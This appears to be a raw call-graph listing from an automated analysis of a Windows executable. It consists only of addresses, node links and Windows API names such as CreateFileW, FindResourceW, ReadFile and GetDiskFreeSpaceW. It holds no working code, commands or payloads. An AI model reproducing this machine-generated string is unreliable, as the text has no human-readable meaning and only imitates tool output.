40115->40116 40117 40cc1d 40116->40117 40182 40b1ab free free 40117->40182 40119 40b7d4 memset CreateFileW 40119->39283 40119->39284 40120->40056 40121->40058 40122->40066 40123->40069 40124->40094 40125->40100 40127 40ab6b 40126->40127 40131 40ab93 40126->40131 40128 40a9ce 4 API calls 40127->40128 40129 40ab74 40128->40129 40130 40ab7c MultiByteToWideChar 40129->40130 40130->40131 40131->40102 40132->40109 40134 40cd7b 40133->40134 40167 40aa29 40134->40167 40136 40cef5 40137 40aa04 free 40136->40137 40138 40cefd 40137->40138 40138->40109 40140 40aa29 6 API calls 40141 40ce1d 40140->40141 40142 40aa29 6 API calls 40141->40142 40143 40ce3e 40142->40143 40144 40ce6a 40143->40144 40175 40abb7 wcslen memmove 40143->40175 40145 40ce9f 40144->40145 40178 40abb7 wcslen memmove 40144->40178 40147 40a8d0 7 API calls 40145->40147 40150 40ceb5 40147->40150 40148 40ce56 40176 40aa71 wcslen 40148->40176 40157 40a8d0 7 API calls 40150->40157 40152 40ce8b 40179 40aa71 wcslen 40152->40179 40153 40ce5e 40177 40abb7 wcslen memmove 40153->40177 40155 40ce93 40180 40abb7 wcslen memmove 40155->40180 40159 40cecb 40157->40159 40181 40d00b malloc memcpy free free 40159->40181 40161 40cedd 40162 40aa04 free 40161->40162 40163 40cee5 40162->40163 40164 40aa04 free 40163->40164 40165 40ceed 40164->40165 40166 40aa04 free 40165->40166 40166->40136 40168 40aa33 40167->40168 40174 40aa63 40167->40174 40169 40aa44 40168->40169 40170 40aa38 wcslen 40168->40170 40171 40a9ce malloc memcpy free free 40169->40171 40170->40169 40172 40aa4d 40171->40172 40173 40aa51 memcpy 40172->40173 40172->40174 40173->40174 40174->40136 40174->40140 40175->40148 40176->40153 40177->40144 40178->40152 40179->40155 40180->40145 40181->40161 40182->40119 40183->39345 40184->39352 37536 44dea5 37537 44deb5 FreeLibrary 37536->37537 37538 44dec3 37536->37538 37537->37538 40194 4148b6 FindResourceW 40195 4148f9 40194->40195 40196 4148cf SizeofResource 40194->40196 40196->40195 40197 4148e0 LoadResource 40196->40197 40197->40195 40198 4148ee LockResource 40197->40198 40198->40195 37712 415304 free 40199 441b3f 40209 43a9f6 40199->40209 40201 441b61 40382 4386af memset 40201->40382 40203 44189a 40204 442bd4 40203->40204 40205 4418e2 40203->40205 40206 4418ea 40204->40206 40384 441409 memset 40204->40384 40205->40206 40383 4414a9 12 API calls 40205->40383 40210 43aa20 40209->40210 40211 43aadf 40209->40211 40210->40211 40212 43aa34 memset 40210->40212 40211->40201 40213 43aa56 40212->40213 40214 43aa4d 40212->40214 40385 43a6e7 40213->40385 40393 42c02e memset 40214->40393 40219 43aad3 40395 4169a7 11 API calls 40219->40395 40220 43aaae 40220->40211 40220->40219 40235 43aae5 40220->40235 40221 43ac18 40224 43ac47 40221->40224 40397 42bbd5 memcpy memcpy memcpy memset memcpy 40221->40397 40225 43aca8 40224->40225 40398 438eed 16 API calls 40224->40398 40228 43acd5 40225->40228 40400 4233ae 11 API calls 40225->40400 40401 423426 11 API calls 40228->40401 40229 43ac87 40399 4233c5 16 API calls 40229->40399 40233 43ace1 40402 439811 163 API calls 40233->40402 40234 43a9f6 161 API calls 40234->40235 40235->40211 40235->40221 40235->40234 40396 439bbb 22 API calls 40235->40396 40237 43acfd 40242 43ad2c 40237->40242 40403 438eed 16 API calls 40237->40403 40239 43ad19 40404 4233c5 16 API calls 40239->40404 40240 43ad58 40405 44081d 163 API calls 40240->40405 40242->40240 40246 43add9 40242->40246 40245 43ae3a memset 40247 43ae73 40245->40247 40246->40246 40409 423426 11 API calls 40246->40409 40410 42e1c0 147 API calls 40247->40410 40248 43adab 40407 438c4e 163 API calls 40248->40407 40251 43ad6c 40251->40211 40251->40248 40406 42370b memset memcpy memset 40251->40406 40253 43adcc 40408 440f84 12 API calls 40253->40408 40254 43ae96 40411 42e1c0 147 API calls 40254->40411 40257 43aea8 40258 43aec1 40257->40258 40412 42e199 147 API calls 40257->40412 40259 43af00 40258->40259 40413 42e1c0 147 API calls 40258->40413 40259->40211 40263 43af1a 40259->40263 40264 43b3d9 40259->40264 40414 438eed 16 API calls 40263->40414 40269 43b3f6 40264->40269 40273 43b4c8 40264->40273 40266 43b60f 40266->40211 40473 4393a5 17 API calls 40266->40473 40268 43af2f 40415 4233c5 16 API calls 40268->40415 40455 432878 12 API calls 40269->40455 40271 43af51 40416 423426 11 API calls 40271->40416 40281 43b4f2 40273->40281 40461 42bbd5 memcpy memcpy memcpy memset memcpy 40273->40461 40275 43af7d 40417 423426 11 API calls 40275->40417 40279 43b529 40463 44081d 163 API calls 40279->40463 40280 43af94 40418 423330 11 API calls 40280->40418 40462 43a76c 21 API calls 40281->40462 40285 43afca 40419 423330 11 API calls 40285->40419 40286 43b47e 40289 43b497 40286->40289 40458 42374a memcpy memset memcpy memcpy memcpy 40286->40458 40287 43b544 40290 43b55c 40287->40290 40464 42c02e memset 40287->40464 40459 4233ae 11 API calls 40289->40459 40465 43a87a 163 API calls 40290->40465 40291 43afdb 40420 4233ae 11 API calls 40291->40420 40296 43b428 40307 43b462 40296->40307 40456 432b60 16 API calls 40296->40456 40298 43b56c 40301 43b58a 40298->40301 40466 423330 11 API calls 40298->40466 40299 43b4b1 40460 423399 11 API calls 40299->40460 40300 43afee 40421 44081d 163 API calls 40300->40421 40467 440f84 12 API calls 40301->40467 40303 43b4c1 40469 42db80 163 API calls 40303->40469 40457 423330 11 API calls 40307->40457 40309 43b592 40468 43a82f 16 API calls 40309->40468 40312 43b5b4 40470 438c4e 163 API calls 40312->40470 40314 43b5cf 40471 42c02e memset 40314->40471 40316 43b005 40316->40211 40320 43b01f 40316->40320 40422 42d836 163 API calls 40316->40422 40317 43b1ef 40432 4233c5 16 API calls 40317->40432 40320->40317 40430 423330 11 API calls 40320->40430 40431 42d71d 163 API calls 40320->40431 40321 43b212 40433 423330 11 API calls 40321->40433 40322 43b087 40423 4233ae 11 API calls 40322->40423 40323 43add4 40323->40266 40472 438f86 16 API calls 40323->40472 40327 43b22a 40434 42ccb5 11 API calls 40327->40434 40330 43b23f 40435 4233ae 11 API calls 40330->40435 40331 43b10f 40426 423330 11 API calls 40331->40426 40333 43b257 40436 4233ae 11 API calls 40333->40436 40337 43b129 40427 4233ae 11 API calls 40337->40427 40338 43b26e 40437 4233ae 11 API calls 40338->40437 40341 43b09a 40341->40331 40424 42cc15 19 API calls 40341->40424 40425 4233ae 11 API calls 40341->40425 40342 43b282 40438 43a87a 163 API calls 40342->40438 40344 43b13c 40428 440f84 12 API calls 40344->40428 40346 43b29d 40439 423330 11 API calls 40346->40439 40349 43b15f 40429 4233ae 11 API calls 40349->40429 40350 43b2af 40352 43b2b8 40350->40352 40353 43b2ce 40350->40353 40440 4233ae 11 API calls 40352->40440 40441 440f84 12 API calls 40353->40441 40356 43b2c9 40443 4233ae 11 API calls 40356->40443 40357 43b2da 40442 42370b memset memcpy memset 40357->40442 40360 43b2f9 40444 423330 11 API calls 40360->40444 40362 43b30b 40445 423330 11 API calls 40362->40445 40364 43b325 40446 423399 11 API calls 40364->40446 40366 43b332 40447 4233ae 11 API calls 40366->40447 40368 43b354 40448 423399 11 API calls 40368->40448 40370 43b364 40449 43a82f 16 API calls 40370->40449 40372 43b370 40450 42db80 163 API calls 40372->40450 40374 43b380 40451 438c4e 163 API calls 40374->40451 40376 43b39e 40452 423399 11 API calls 40376->40452 40378 43b3ae 40453 43a76c 21 API calls 40378->40453 40380 43b3c3 40454 423399 11 API calls 40380->40454 40382->40203 40383->40206 40384->40204 40386 43a6f5 40385->40386 40392 43a765 40385->40392 40386->40392 40474 42a115 40386->40474 40390 43a73d 40391 42a115 147 API calls 40390->40391 40390->40392 40391->40392 40392->40211 40394 4397fd memset 40392->40394 40393->40213 40394->40220 40395->40211 40396->40235 40397->40224 40398->40229 40399->40225 40400->40228 40401->40233 40402->40237 40403->40239 40404->40242 40405->40251 40406->40248 40407->40253 40408->40323 40409->40245 40410->40254 40411->40257 40412->40258 40413->40258 40414->40268 40415->40271 40416->40275 40417->40280 40418->40285 40419->40291 40420->40300 40421->40316 40422->40322 40423->40341 40424->40341 40425->40341 40426->40337 40427->40344 40428->40349 40429->40320 40430->40320 40431->40320 40432->40321 40433->40327 40434->40330 40435->40333 40436->40338 40437->40342 40438->40346 40439->40350 40440->40356 40441->40357 40442->40356 40443->40360 40444->40362 40445->40364 40446->40366 40447->40368 40448->40370 40449->40372 40450->40374 40451->40376 40452->40378 40453->40380 40454->40323 40455->40296 40456->40307 40457->40286 40458->40289 40459->40299 40460->40303 40461->40281 40462->40279 40463->40287 40464->40290 40465->40298 40466->40301 40467->40309 40468->40303 40469->40312 40470->40314 40471->40323 40472->40266 40473->40211 40475 42a175 40474->40475 40477 42a122 40474->40477 40475->40392 40480 42b13b 147 API calls 40475->40480 40477->40475 40478 42a115 147 API calls 40477->40478 40481 43a174 40477->40481 40505 42a0a8 147 API calls 40477->40505 40478->40477 40480->40390 40495 43a196 40481->40495 40496 43a19e 40481->40496 40482 43a306 40482->40495 40518 4388c4 14 API calls 40482->40518 40485 42a115 147 API calls 40485->40496 40486 415a91 memset 40486->40496 40487 43a642 40487->40495 40522 4169a7 11 API calls 40487->40522 40489 4165ff 11 API calls 40489->40496 40491 43a635 40521 42c02e memset 40491->40521 40495->40477 40496->40482 40496->40485 40496->40486 40496->40489 40496->40495 40506 42ff8c 40496->40506 40514 439504 13 API calls 40496->40514 40515 4312d0 147 API calls 40496->40515 40516 42be4c memcpy memcpy memcpy memset memcpy 40496->40516 40517 43a121 11 API calls 40496->40517 40498 4169a7 11 API calls 40499 43a325 40498->40499 40499->40487 40499->40491 40499->40495 40499->40498 40500 42b5b5 memset memcpy 40499->40500 40501 42bf4c 14 API calls 40499->40501 40504 4165ff 11 API calls 40499->40504 40519 42b63e 14 API calls 40499->40519 40520 42bfcf memcpy 40499->40520 40500->40499 40501->40499 40504->40499 40505->40477 40507 43817e 139 API calls 40506->40507 40508 42ff99 40507->40508 40509 42ffe3 40508->40509 40510 42ffd0 40508->40510 40513 42ff9d 40508->40513 40524 4169a7 11 API calls 40509->40524 40523 4169a7 11 API calls 40510->40523 40513->40496 40514->40496 40515->40496 40516->40496 40517->40496 40518->40499 40519->40499 40520->40499 40521->40487 40522->40495 40523->40513 40524->40513 40546 41493c EnumResourceNamesW 37540 4287c1 37541 4287d2 37540->37541 37542 429ac1 37540->37542 37543 428818 37541->37543 37544 42881f 37541->37544 37558 425711 37541->37558 37557 425ad6 37542->37557 37610 415c56 11 API calls 37542->37610 37577 42013a 37543->37577 37605 420244 97 API calls 37544->37605 37549 4260dd 37604 424251 120 API calls 37549->37604 37551 4259da 37603 416760 11 API calls 37551->37603 37556 429a4d 37560 429a66 37556->37560 37561 429a9b 37556->37561 37558->37542 37558->37551 37558->37556 37559 422aeb memset memcpy memcpy 37558->37559 37563 4260a1 37558->37563 37573 4259c2 37558->37573 37576 425a38 37558->37576 37593 4227f0 memset memcpy 37558->37593 37594 422b84 15 API calls 37558->37594 37595 422b5d memset memcpy memcpy 37558->37595 37596 422640 13 API calls 37558->37596 37598 4241fc 11 API calls 37558->37598 37599 42413a 90 API calls 37558->37599 37559->37558 37606 415c56 11 API calls 37560->37606 37565 429a96 37561->37565 37608 416760 11 API calls 37561->37608 37602 415c56 11 API calls 37563->37602 37609 424251 120 API calls 37565->37609 37568 429a7a 37607 416760 11 API calls 37568->37607 37573->37557 37597 415c56 11 API calls 37573->37597 37576->37573 37600 422640 13 API calls 37576->37600 37601 4226e0 12 API calls 37576->37601 37578 42014c 37577->37578 37581 420151 37577->37581 37620 41e466 97 API calls 37578->37620 37580 420162 37580->37558 37581->37580 37582 4201b3 37581->37582 37583 420229 37581->37583 37584 4201b8 37582->37584 37585 4201dc 37582->37585 37583->37580 37586 41fd5e 86 API calls 37583->37586 37611 41fbdb 37584->37611 37585->37580 37589 4201ff 37585->37589 37617 41fc4c 37585->37617 37586->37580 37589->37580 37592 42013a 97 API calls 37589->37592 37592->37580 37593->37558 37594->37558 37595->37558 37596->37558 37597->37551 37598->37558 37599->37558 37600->37576 37601->37576 37602->37551 37603->37549 37604->37557 37605->37558 37606->37568 37607->37565 37608->37565 37609->37542 37610->37551 37612 41fbf8 37611->37612 37615 41fbf1 37611->37615 37625 41ee26 37612->37625 37616 41fc39 37615->37616 37635 4446ce 11 API calls 37615->37635 37616->37580 37621 41fd5e 37616->37621 37618 41ee6b 86 API calls 37617->37618 37619 41fc5d 37618->37619 37619->37585 37620->37581 37623 41fd65 37621->37623 37622 41fdab 37622->37580 37623->37622 37624 41fbdb 86 API calls 37623->37624 37624->37623 37626 41ee41 37625->37626 37627 41ee32 37625->37627 37636 41edad 37626->37636 37639 4446ce 11 API calls 37627->37639 37630 41ee3c 37630->37615 37633 41ee58 37633->37630 37641 41ee6b 37633->37641 37635->37616 37645 41be52 37636->37645 37639->37630 37640 41eb85 11 API calls 37640->37633 37642 41ee70 37641->37642 37643 41ee78 37641->37643 37698 41bf99 86 API calls 37642->37698 37643->37630 37646 41be6f 37645->37646 37647 41be5f 37645->37647 37653 41be8c 37646->37653 37677 418c63 memset memset 37646->37677 37676 4446ce 11 API calls 37647->37676 37649 41bee7 37650 41be69 37649->37650 37681 41a453 86 API calls 37649->37681 37650->37630 37650->37640 37653->37649 37653->37650 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37680 4446ce 11 API calls 37654->37680 37657 41bef0 37655->37657 37660 41bee2 37655->37660 37657->37649 37658 41bf01 37657->37658 37659 41bf24 memset 37658->37659 37664 41bf14 37658->37664 37678 418a6d memset memcpy memset 37658->37678 37659->37650 37666 41ac13 37660->37666 37679 41a223 memset memcpy memset 37664->37679 37665 41bf20 37665->37659 37667 41ac52 37666->37667 37668 41ac3f memset 37666->37668 37670 41ac6a 37667->37670 37682 41dc14 19 API calls 37667->37682 37673 41acd9 37668->37673 37672 41aca1 37670->37672 37683 41519d 37670->37683 37672->37673 37674 41acc0 memset 37672->37674 37675 41accd memcpy 37672->37675 37673->37649 37674->37673 37675->37673 37676->37650 37677->37653 37678->37664 37679->37665 37680->37649 37682->37670 37686 4175ed 37683->37686 37694 417570 SetFilePointer 37686->37694 37689 41760a ReadFile 37690 417637 37689->37690 37691 417627 GetLastError 37689->37691 37692 41763e memset 37690->37692 37693 4151b3 37690->37693 37691->37693 37692->37693 37693->37672 37695 4175b2 37694->37695 37696 41759c GetLastError 37694->37696 37695->37689 37695->37693 37696->37695 37697 4175a8 GetLastError 37696->37697 37697->37695 37698->37643 37699 417bc5 37700 417c61 37699->37700 37701 417bda 37699->37701 37701->37700 37702 417bf6 UnmapViewOfFile CloseHandle 37701->37702 37704 417c2c 37701->37704 37706 4175b7 37701->37706 37702->37701 37702->37702 37704->37701 37711 41851e 20 API calls 37704->37711 37707 4175d6 CloseHandle 37706->37707 37708 4175c8 37707->37708 37709 4175df 37707->37709 37708->37709 37710 4175ce Sleep 37708->37710 37709->37701 37710->37707 37711->37704 37718 4415ea 37726 4304b2 37718->37726 37720 4415fe 37721 4418ea 37720->37721 37722 442bd4 37720->37722 37723 4418e2 37720->37723 37722->37721 37774 441409 memset 37722->37774 37723->37721 37773 4414a9 12 API calls 37723->37773 37775 43041c 12 API calls 37726->37775 37728 4304cd 37733 430557 37728->37733 37776 43034a memcpy 37728->37776 37730 4304f3 37730->37733 37777 430468 11 API calls 37730->37777 37732 430506 37732->37733 37734 43057b 37732->37734 37778 43817e 37732->37778 37733->37720 37783 415a91 37734->37783 37739 4305e4 37739->37733 37788 4328e4 12 API calls 37739->37788 37741 43052d 37741->37733 37741->37734 37744 430542 37741->37744 37743 4305fa 37745 430609 37743->37745 37789 423383 11 API calls 37743->37789 37744->37733 37782 4169a7 11 API calls 37744->37782 37790 423330 11 API calls 37745->37790 37748 430634 37791 423399 11 API calls 37748->37791 37750 430648 37792 4233ae 11 API calls 37750->37792 37752 43066b 37793 423330 11 API calls 37752->37793 37754 43067d 37794 4233ae 11 API calls 37754->37794 37756 430695 37795 423330 11 API calls 37756->37795 37758 4306d6 37797 423330 11 API calls 37758->37797 37759 4306a7 37759->37758 37760 4306c0 37759->37760 37796 4233ae 11 API calls 37760->37796 37763 4306d1 37798 430369 17 API calls 37763->37798 37765 4306f3 37799 423330 11 API calls 37765->37799 37767 430704 37800 423330 11 API calls 37767->37800 37769 430710 37801 423330 11 API calls 37769->37801 37771 43071e 37802 423383 11 API calls 37771->37802 37773->37721 37774->37722 37775->37728 37776->37730 37777->37732 37779 438187 37778->37779 37781 438192 37778->37781 37803 4380f6 37779->37803 37781->37741 37782->37733 37784 415a9d 37783->37784 37785 415ab3 37784->37785 37786 415aa4 memset 37784->37786 37785->37733 37787 4397fd memset 37785->37787 37786->37785 37787->37739 37788->37743 37789->37745 37790->37748 37791->37750 37792->37752 37793->37754 37794->37756 37795->37759 37796->37763 37797->37763 37798->37765 37799->37767 37800->37769 37801->37771 37802->37733 37805 43811f 37803->37805 37804 438164 37804->37781 37805->37804 37808 437e5e 37805->37808 37831 4300e8 memset memset memcpy 37805->37831 37832 437d3c 37808->37832 37810 437eb3 37810->37805 37811 437ea9 37811->37810 37816 437f22 37811->37816 37847 41f432 37811->37847 37814 437f06 37897 415c56 11 API calls 37814->37897 37819 437f7f 37816->37819 37898 432d4e 37816->37898 37817 437f95 37902 415c56 11 API calls 37817->37902 37819->37817 37820 43802b 37819->37820 37858 4165ff 37820->37858 37822 437fa3 37822->37810 37905 41f638 104 API calls 37822->37905 37827 43806b 37829 438094 37827->37829 37903 42f50e 138 API calls 37827->37903 37829->37822 37904 4300e8 memset memset memcpy 37829->37904 37831->37805 37833 437d69 37832->37833 37836 437d80 37832->37836 37918 437ccb 11 API calls 37833->37918 37835 437d76 37835->37811 37836->37835 37837 437da3 37836->37837 37839 437d90 37836->37839 37906 438460 37837->37906 37839->37835 37922 437ccb 11 API calls 37839->37922 37841 437de8 37921 424f26 123 API calls 37841->37921 37843 437dcb 37843->37841 37919 444283 13 API calls 37843->37919 37845 437dfc 37920 437ccb 11 API calls 37845->37920 37848 41f54d 37847->37848 37852 41f44f 37847->37852 37849 41f466 37848->37849 38093 41c635 memset memset 37848->38093 37849->37814 37849->37816 37852->37849 37856 41f50b 37852->37856 38064 41f1a5 37852->38064 38089 41c06f memcmp 37852->38089 38090 41f3b1 90 API calls 37852->38090 38091 41f398 86 API calls 37852->38091 37856->37848 37856->37849 38092 41c295 86 API calls 37856->38092 37859 4165a0 11 API calls 37858->37859 37860 41660d 37859->37860 37861 437371 37860->37861 37862 41703f 11 API calls 37861->37862 37863 437399 37862->37863 37864 43739d 37863->37864 37866 4373ac 37863->37866 38202 4446ea 11 API calls 37864->38202 37867 416935 16 API calls 37866->37867 37883 4373ca 37867->37883 37868 437584 37870 4375bc 37868->37870 38209 42453e 123 API calls 37868->38209 37869 438460 134 API calls 37869->37883 37872 415c7d 16 API calls 37870->37872 37873 4375d2 37872->37873 37877 4373a7 37873->37877 38210 4442e6 37873->38210 37876 4375e2 37876->37877 38217 444283 13 API calls 37876->38217 37877->37827 37879 415a91 memset 37879->37883 37882 43758f 38208 42453e 123 API calls 37882->38208 37883->37868 37883->37869 37883->37879 37883->37882 37896 437d3c 135 API calls 37883->37896 38184 4251c4 37883->38184 38203 425433 13 API calls 37883->38203 38204 425413 17 API calls 37883->38204 38205 42533e 16 API calls 37883->38205 38206 42538f 16 API calls 37883->38206 38207 42453e 123 API calls 37883->38207 37886 4375f4 37890 437620 37886->37890 37891 43760b 37886->37891 37888 43759f 37889 416935 16 API calls 37888->37889 37889->37868 37892 416935 16 API calls 37890->37892 38218 444283 13 API calls 37891->38218 37892->37877 37895 437612 memcpy 37895->37877 37896->37883 37897->37810 37899 432d65 37898->37899 37900 432d58 37898->37900 37899->37819 38293 432cc4 memset memset memcpy 37900->38293 37902->37822 37903->37829 37904->37822 37905->37810 37923 41703f 37906->37923 37908 43847a 37909 43848a 37908->37909 37910 43847e 37908->37910 37930 438270 37909->37930 37960 4446ea 11 API calls 37910->37960 37914 438488 37914->37843 37916 4384bb 37917 438270 134 API calls 37916->37917 37917->37914 37918->37835 37919->37845 37920->37841 37921->37835 37922->37835 37924 417044 37923->37924 37925 41705c 37923->37925 37929 417055 37924->37929 37962 416760 11 API calls 37924->37962 37926 417075 37925->37926 37963 41707a 11 API calls 37925->37963 37926->37908 37929->37908 37931 415a91 memset 37930->37931 37932 43828d 37931->37932 37933 438297 37932->37933 37934 438341 37932->37934 37936 4382d6 37932->37936 37935 415c7d 16 API calls 37933->37935 37964 44358f 37934->37964 37938 438458 37935->37938 37939 4382fb 37936->37939 37940 4382db 37936->37940 37938->37914 37961 424f26 123 API calls 37938->37961 38007 415c23 memcpy 37939->38007 37995 416935 37940->37995 37943 438305 37947 44358f 19 API calls 37943->37947 37949 438318 37943->37949 37944 4382e9 38003 415c7d 37944->38003 37946 438373 37952 438383 37946->37952 38008 4300e8 memset memset memcpy 37946->38008 37947->37949 37949->37946 37990 43819e 37949->37990 37951 4383cd 37953 4383f5 37951->37953 38010 42453e 123 API calls 37951->38010 37952->37951 38009 415c23 memcpy 37952->38009 37956 438404 37953->37956 37957 43841c 37953->37957 37959 416935 16 API calls 37956->37959 37958 416935 16 API calls 37957->37958 37958->37933 37959->37933 37960->37914 37961->37916 37962->37929 37963->37924 37965 4435be 37964->37965 37966 44360c 37965->37966 37968 443676 37965->37968 37971 4436ce 37965->37971 37975 44366c 37965->37975 38011 442ff8 37965->38011 37966->37949 37967 443758 37980 443775 37967->37980 38020 441409 memset 37967->38020 37968->37967 37970 443737 37968->37970 37972 442ff8 19 API calls 37968->37972 37973 442ff8 19 API calls 37970->37973 37977 4165ff 11 API calls 37971->37977 37972->37970 37973->37967 38019 4169a7 11 API calls 37975->38019 37976 4437be 37981 4437de 37976->37981 38022 416760 11 API calls 37976->38022 37977->37968 37980->37976 38021 415c56 11 API calls 37980->38021 37984 443801 37981->37984 38023 42463b memset memcpy 37981->38023 37983 443826 38025 43bd08 memset 37983->38025 37984->37983 38024 43024d memset 37984->38024 37988 443837 37988->37966 38026 43024d memset 37988->38026 37991 438246 37990->37991 37993 4381ba 37990->37993 37991->37946 37992 41f432 110 API calls 37992->37993 37993->37991 37993->37992 38042 41f638 104 API calls 37993->38042 37996 41693e 37995->37996 37999 41698e 37995->37999 37997 41694c 37996->37997 38043 422fd1 memset 37996->38043 37997->37999 38044 4165a0 37997->38044 37999->37944 38004 415c81 38003->38004 38005 415c9c 38003->38005 38004->38005 38006 416935 16 API calls 38004->38006 38005->37933 38006->38005 38007->37943 38008->37952 38009->37951 38010->37953 38012 442ffe 38011->38012 38013 443094 38012->38013 38017 443092 38012->38017 38027 4414ff 38012->38027 38039 4169a7 11 API calls 38012->38039 38040 441325 memset 38012->38040 38041 4414a9 12 API calls 38013->38041 38017->37965 38019->37968 38020->37967 38021->37976 38022->37981 38023->37984 38024->37983 38025->37988 38026->37988 38028 441539 38027->38028 38029 441547 38027->38029 38028->38029 38030 441575 38028->38030 38031 441582 38028->38031 38032 4418e2 38029->38032 38038 442bd4 38029->38038 38034 42fccf 18 API calls 38030->38034 38033 43275a 12 API calls 38031->38033 38035 4414a9 12 API calls 38032->38035 38036 4418ea 38032->38036 38033->38029 38034->38029 38035->38036 38036->38012 38037 441409 memset 38037->38038 38038->38036 38038->38037 38039->38012 38040->38012 38041->38017 38042->37993 38043->37997 38050 415cfe 38044->38050 38049 422b84 15 API calls 38049->37999 38051 41628e 38050->38051 38056 415d23 __aullrem __aulldvrm 38050->38056 38058 416520 38051->38058 38052 4163ca 38053 416422 10 API calls 38052->38053 38053->38051 38054 416422 10 API calls 38054->38056 38055 416172 memset 38055->38056 38056->38051 38056->38052 38056->38054 38056->38055 38057 415cb9 10 API calls 38056->38057 38057->38056 38059 416527 38058->38059 38063 416574 38058->38063 38060 415700 10 API calls 38059->38060 38061 416544 38059->38061 38059->38063 38060->38061 38062 416561 memcpy 38061->38062 38061->38063 38062->38063 38063->37999 38063->38049 38094 41bc3b 38064->38094 38067 41edad 86 API calls 38068 41f1cb 38067->38068 38069 41f1f5 memcmp 38068->38069 38070 41f20e 38068->38070 38074 41f282 38068->38074 38069->38070 38071 41f21b memcmp 38070->38071 38070->38074 38072 41f326 38071->38072 38075 41f23d 38071->38075 38073 41ee6b 86 API calls 38072->38073 38072->38074 38073->38074 38074->37852 38075->38072 38076 41f28e memcmp 38075->38076 38118 41c8df 56 API calls 38075->38118 38076->38072 38077 41f2a9 38076->38077 38077->38072 38080 41f308 38077->38080 38081 41f2d8 38077->38081 38079 41f269 38079->38072 38082 41f287 38079->38082 38083 41f27a 38079->38083 38080->38072 38123 4446ce 11 API calls 38080->38123 38084 41ee6b 86 API calls 38081->38084 38082->38076 38085 41ee6b 86 API calls 38083->38085 38086 41f2e0 38084->38086 38085->38074 38119 41b1ca 38086->38119 38089->37852 38090->37852 38091->37852 38092->37848 38093->37849 38096 41bc54 38094->38096 38103 41be0b 38094->38103 38099 41bd61 38096->38099 38096->38103 38107 41bc8d 38096->38107 38124 41baf0 55 API calls 38096->38124 38098 41be45 38098->38067 38098->38074 38099->38098 38133 41a25f memset 38099->38133 38101 41be04 38131 41aee4 56 API calls 38101->38131 38103->38099 38132 41ae17 34 API calls 38103->38132 38104 41bd42 38104->38099 38104->38101 38105 41bdd8 memset 38104->38105 38106 41bdba 38104->38106 38108 41bde7 memcmp 38105->38108 38117 4175ed 6 API calls 38106->38117 38107->38099 38107->38104 38109 41bd18 38107->38109 38125 4151e3 38107->38125 38108->38101 38111 41bdfd 38108->38111 38109->38099 38109->38104 38129 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38109->38129 38110 41bdcc 38110->38099 38110->38108 38130 41a1b0 memset 38111->38130 38117->38110 38118->38079 38120 41b1e4 38119->38120 38122 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38120->38122 38183 41a1b0 memset 38120->38183 38122->38074 38123->38072 38124->38107 38134 41837f 38125->38134 38128 444706 11 API calls 38128->38109 38129->38104 38130->38101 38131->38103 38132->38099 38133->38098 38135 4183c1 38134->38135 38138 4183ca 38134->38138 38181 418197 25 API calls 38135->38181 38139 4151f9 38138->38139 38155 418160 38138->38155 38139->38109 38139->38128 38140 4183e5 38140->38139 38164 41739b 38140->38164 38143 418444 CreateFileW 38145 418477 38143->38145 38144 41845f CreateFileA 38144->38145 38146 4184c2 memset 38145->38146 38147 41847e GetLastError free 38145->38147 38167 418758 38146->38167 38148 4184b5 38147->38148 38149 418497 38147->38149 38182 444706 11 API calls 38148->38182 38151 41837f 49 API calls 38149->38151 38151->38139 38156 41739b GetVersionExW 38155->38156 38157 418165 38156->38157 38159 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38157->38159 38160 418178 38159->38160 38161 41817f 38160->38161 38162 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38160->38162 38161->38140 38163 418188 free 38162->38163 38163->38140 38165 4173d6 38164->38165 38166 4173ad GetVersionExW 38164->38166 38165->38143 38165->38144 38166->38165 38168 418680 43 API calls 38167->38168 38169 418782 38168->38169 38170 418160 11 API calls 38169->38170 38172 418506 free 38169->38172 38171 418799 38170->38171 38171->38172 38173 41739b GetVersionExW 38171->38173 38172->38139 38174 4187a7 38173->38174 38175 4187da 38174->38175 38176 4187ad GetDiskFreeSpaceW 38174->38176 38178 4187ec GetDiskFreeSpaceA 38175->38178 38180 4187e8 38175->38180 38179 418800 free 38176->38179 38178->38179 38179->38172 38180->38178 38181->38138 38182->38139 38183->38122 38219 424f07 38184->38219 38186 4251e4 38187 4251f7 38186->38187 38188 4251e8 38186->38188 38227 4250f8 38187->38227 38226 4446ea 11 API calls 38188->38226 38190 4251f2 38190->37883 38192 425209 38195 425249 38192->38195 38198 4250f8 127 API calls 38192->38198 38199 425287 38192->38199 38235 4384e9 135 API calls 38192->38235 38236 424f74 124 API calls 38192->38236 38193 415c7d 16 API calls 38193->38190 38195->38199 38237 424ff0 13 API calls 38195->38237 38198->38192 38199->38193 38200 425266 38200->38199 38238 415be9 memcpy 38200->38238 38202->37877 38203->37883 38204->37883 38205->37883 38206->37883 38207->37883 38208->37888 38209->37870 38211 4442eb 38210->38211 38214 444303 38210->38214 38291 41707a 11 API calls 38211->38291 38213 4442f2 38213->38214 38292 4446ea 11 API calls 38213->38292 38214->37876 38216 444300 38216->37876 38217->37886 38218->37895 38220 424f1f 38219->38220 38221 424f0c 38219->38221 38240 424eea 11 API calls 38220->38240 38239 416760 11 API calls 38221->38239 38224 424f18 38224->38186 38225 424f24 38225->38186 38226->38190 38228 425108 38227->38228 38234 42510d 38227->38234 38273 424f74 124 API calls 38228->38273 38231 42516e 38233 415c7d 16 API calls 38231->38233 38232 425115 38232->38192 38233->38232 38234->38232 38241 42569b 38234->38241 38235->38192 38236->38192 38237->38200 38238->38199 38239->38224 38240->38225 38251 4256f1 38241->38251 38269 4259c2 38241->38269 38246 4260dd 38285 424251 120 API calls 38246->38285 38250 429a4d 38253 429a66 38250->38253 38254 429a9b 38250->38254 38251->38250 38252 422aeb memset memcpy memcpy 38251->38252 38256 4260a1 38251->38256 38265 4259da 38251->38265 38267 429ac1 38251->38267 38251->38269 38272 425a38 38251->38272 38274 4227f0 memset memcpy 38251->38274 38275 422b84 15 API calls 38251->38275 38276 422b5d memset memcpy memcpy 38251->38276 38277 422640 13 API calls 38251->38277 38279 4241fc 11 API calls 38251->38279 38280 42413a 90 API calls 38251->38280 38252->38251 38286 415c56 11 API calls 38253->38286 38258 429a96 38254->38258 38288 416760 11 API calls 38254->38288 38283 415c56 11 API calls 38256->38283 38289 424251 